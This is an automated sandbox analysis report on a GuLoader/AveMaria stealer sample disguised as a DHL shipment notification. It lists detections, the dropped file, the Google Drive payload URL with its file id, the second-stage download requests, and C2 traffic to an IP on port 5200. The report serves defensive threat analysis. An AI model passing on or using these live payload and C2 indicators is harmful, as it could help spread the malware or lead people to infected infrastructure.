Windows Analysis Report DHL Express shipment notification.exe

AV Detection:

Found malware configuration

Source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downlo8"}

Multi AV Scanner detection for submitted file

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%			Perma Link
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Yara detected AveMaria stealer

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\images.exe	Virustotal: Detection: 25%			Perma Link
Source: C:\ProgramData\images.exe	ReversingLabs: Detection: 11%

Antivirus or Machine Learning detection for unpacked file

Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 39.2.cmd.exe.4f80000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack	Avira: Label: TR/Patched.Ren.Gen2

Compliance:

Uses 32bit PE files

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49766 version: TLS 1.2

Creates a directory in C:\Program Files

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downlo8

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29
Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0c-74-docs.googleusercontent.comCookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49768 -> 194.85.248.156:5200

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

URLs found in memory or binary data

Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 0000000F.00000002.5703883842.000000000DA1B000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 0000000F.00000002.5701480202.000000000D849000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.980284348.000000000D267000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.929431409.000000000D267000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.985595787.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.934050366.000000000D7F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000F.00000002.5703883842.000000000DA1B000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000F.00000000.936184682.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987848818.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000F.00000000.987919975.000000000DA15000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935114993.000000000D8EB000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000F.00000000.976658395.0000000009B50000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.926660869.000000000A7E0000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.914833980.0000000002FA0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322042045.00000000018AA000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330432531.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: explorer.exe, 0000000F.00000000.972782863.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.922114611.00000000094E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5684842071.000000000950F000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000F.00000000.936033459.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987676176.000000000D9E2000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703429729.000000000D9C6000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/g
Source: explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000F.00000000.987052343.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5702840793.000000000D954000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935402531.000000000D954000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000000.924171358.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.974913981.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5687107200.00000000096F1000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.comr9
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: images.exe, 0000001D.00000003.1347566980.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330644774.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/
Source: images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/#9
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidum
Source: DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/%%doc-10-6k-docs.googleusercontent.com
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/XM
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe549
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleuserco
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/(
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g4
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g8D
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9gX
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9geJYQtWVvXHi4Ubp9Y
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: drive.google.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
